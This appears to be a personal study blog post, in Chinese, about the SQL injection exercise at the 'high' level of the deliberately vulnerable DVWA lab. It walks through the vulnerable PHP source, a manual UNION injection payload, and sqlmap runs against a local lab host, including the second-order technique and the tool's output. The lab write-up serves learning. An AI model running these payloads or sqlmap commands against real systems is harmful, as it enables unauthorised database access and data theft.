2019-2-26 dvwa学习(3)–sql注入级别high和session
继续把dvwa环境安全级别调整为high
观察界面
high级别页面,点击"here to change your ID",会打开另外一个网页(session-input.php),然后输入3,提交,在主页面上会显示数据。
感觉high和low差不多,只不过high的提交和显示结果不在一个页面上。
先尝试按照low级别的同样方法攻击。
结果也是可以注入成功,说明high也字符型注入。
我们可以研究一下与源代码的执行过程。
step1./var/www/html/vulnerabilities/sqli/index.php
$page[ 'body' ] .= "Click <a href=\"#\" onclick=\"javascript:popUp('session-input.php');return false;\">here to change your ID</a>.";
以上代码表示点击"here to change your ID",会打开session-input.php页面
step2./var/www/html/vulnerabilities/sqli/session-input.php
<?php
define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
require_once DVWA_WEB_PAGE_TO_ROOT . 'dvwa/includes/dvwaPage.inc.php';
dvwaPageStartup( array( 'authenticated', 'phpids' ) );
$page = dvwaPageNewGrab();
$page[ 'title' ] = 'SQL Injection Session Input' . $page[ 'title_separator' ].$page[ 'title' ];
if( isset( $_POST[ 'id' ] ) ) {
$_SESSION[ 'id' ] = $_POST[ 'id' ];
//$page[ 'body' ] .= "Session ID set!<br /><br /><br />";
$page[ 'body' ] .= "Session ID: {$_SESSION[ 'id' ]}<br /><br /><br />";
$page[ 'body' ] .= "<script>window.opener.location.reload(true);</script>";
}
$page[ 'body' ] .= "
<form action=\"#\" method=\"POST\">
<input type=\"text\" size=\"15\" name=\"id\">
<input type=\"submit\" name=\"Submit\" value=\"Submit\">
</form>
<hr />
<br />
<button onclick=\"self.close();\">Close</button>";
dvwaSourceHtmlEcho( $page );
?>
简单说明
1.这个页面数据是提交本页的<action="#">
2.数据提交后,php预定义变量$_POST会收集表单id域的数据
3.$_POST[ ‘id’ ]如果存在,会赋值给预定义的$_SESSION[ ‘id’ ]。而session信息是保留在服务器上。注意:此时在session中保留的就是以下信息
1' union select column_name,column_type from information_schema.columns where table_name='users' and table_schema='dvwa'#
session在服务器上保存信息可以参见下面
root@1cae08f0d608:/var/lib/php/sessions# ls -l
total 4
-rw------- 1 www-data www-data 246 Feb 27 01:09 sess_mtnslp6slj5aup7n1tqh2ouc72
root@1cae08f0d608:/var/lib/php/sessions# cat sess_mtnslp6slj5aup7n1tqh2ouc72
dvwa|a:2:{s:8:"messages";a:0:{}s:8:"username";s:5:"admin";}id|s:121:"1' union select column_name,column_type from information_schema.columns where table_name='users' and table_schema='dvwa'#";session_token|s:32:"b6bc30f8d87d2e146baaff5e5a1c
4.在界面上显示Session ID:<session中的内容>
5.最后刷新父窗口,也就是/var/www/html/vulnerabilities/sqli/index.php
step3./var/www/html/vulnerabilities/sqli/index.php
在这里会执行high.php(加载在step1时候已经完成-require_once)
require_once DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/sqli/source/{$vulnerabilityFile}";
step4./var/www/html/vulnerabilities/sqli/source/high.php
<?php
if( isset( $_SESSION [ 'id' ] ) ) {
// Get input
$id = $_SESSION[ 'id' ];
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
在这里,只要$_SESSION[ ‘id’ ]存在,那就会执行数据库查询。step1时候,不存在$_SESSION[ ‘id’ ],所以不执行;而在step2中,session-input.php中保存了$_SESSION[ ‘id’ ],此时开始执行数据库查询。
high级别查询安全性甚至都不如medium级别,并没有用mysqli_real_escape_string转义特殊字符。只是用“LIMIT 1”来限制数据显示条数,显然是可以被注入的"#"来屏蔽的。
以上就是整个代码的执行过程,实在不理解为什么级别被定义为high。
下面测试一下sqlmap攻击
我们打开session-input.php的开发者工具,获取cookie
现在尝试按照前面的方式攻击,尝试获取所有表名,post方式采用–data参数
C:\Python27\sqlmap>sqlmap.py -u "http://192.168.99.100/vulnerabilities/sqli/" --data "id=1 & Submit=Submit " --cookie "PHPSESSID=mtnslp6slj5aup7n1tqh2ouc72; security=high" --batch -D dvwa --tables
___
__H__
___ ___[(]_____ ___ ___ {1.3.2.22#dev}
|_ -| . [.] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:14:27 /2019-02-26/
[17:14:27] [INFO] resuming back-end DBMS 'mysql'
[17:14:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (1426=1426) THEN 1 ELSE (SELECT 4462 UNION SELECT 4808) END))&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 5505 FROM(SELECT COUNT(*),CONCAT(0x71786a6271,(SELECT (ELT(5505=5505,1))),0x717a6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)&Submit=Submit
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=1 UNION ALL SELECT CONCAT(0x71786a6271,0x597353525655566d6d4577594e7a79776b7863416a6e6d4c50654f50676d457a4979794759456458,0x717a6b6b71),NULL-- HLAr&Submit=Submit
---
[17:14:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0
[17:14:27] [INFO] fetching tables for database: 'dvwa'
[17:14:27] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[17:14:27] [WARNING] the SQL query provided does not return any output
[17:14:27] [WARNING] the SQL query provided does not return any output
[17:14:27] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[17:14:27] [WARNING] the SQL query provided does not return any output
[17:14:27] [WARNING] the SQL query provided does not return any output
[17:14:27] [INFO] fetching number of tables for database 'dvwa'
[17:14:27] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[17:14:27] [INFO] retrieved:
[17:14:27] [WARNING] time-based comparison requires larger statistical model, please wait............ (done)
[17:14:27] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[17:14:27] [WARNING] unable to retrieve the number of tables for database 'dvwa'
[17:14:28] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] N
No tables found
[17:14:28] [INFO] fetched data logged to text files under 'C:\Users\xxx\AppData\Local\sqlmap\output\192.168.99.100'
[*] ending @ 17:14:28 /2019-02-26/
失败了。
查了网上攻略,解释如下:
当查询数据提交、结果显示分别在2个不同的页面中,那么在一个sqlmap操作命令中就需要包含这2个不同页面的url和其他关键信息。此时需要利用参数–second-order(设置二阶响应的结果显示页面的url)来操作sqlmap。
second-order有些网站上也写作“二阶SQL注入”。有些时候注入点输入的数据看返回结果的时候并不是当前的页面,而是另外的一个页面,这时候就需要你指定到哪个页面获取响应判断真假。
second-order后面跟一个判断页面的URL地址。
尝试如下:
C:\Python27\sqlmap>sqlmap.py -u "http://192.168.99.100/vulnerabilities/sqli/session-input.php" --second-url "http://192.168.99.100/vulnerabilities/sqli/" --data "id=1 & Submit=Submit " --cookie "PHPSESSID=mtnslp6slj5aup7n1tqh2ouc72; security=high" -D dvwa -T users --tables --batch
___
__H__
___ ___[']_____ ___ ___ {1.3.2.22#dev}
|_ -| . ["] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:48:31 /2019-02-27/
[15:48:32] [INFO] resuming back-end DBMS 'mysql'
[15:48:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=a'' ' UNION ALL SELECT CONCAT(CONCAT('qkzpq','AnAobpxMEVvrQhDbPUwYvCTponUepPqCpwoBwMDl'),'qpqqq'),NULL-- weNx& Submit=Submit
---
[15:48:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL 5 (MariaDB fork)
[15:48:32] [INFO] fetching tables for database: 'dvwa'
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+
[15:48:32] [INFO] fetched data logged to text files under 'C:\Users\xxx\AppData\Local\sqlmap\output\192.168.99.100'
[*] ending @ 15:48:32 /2019-02-27/
成功。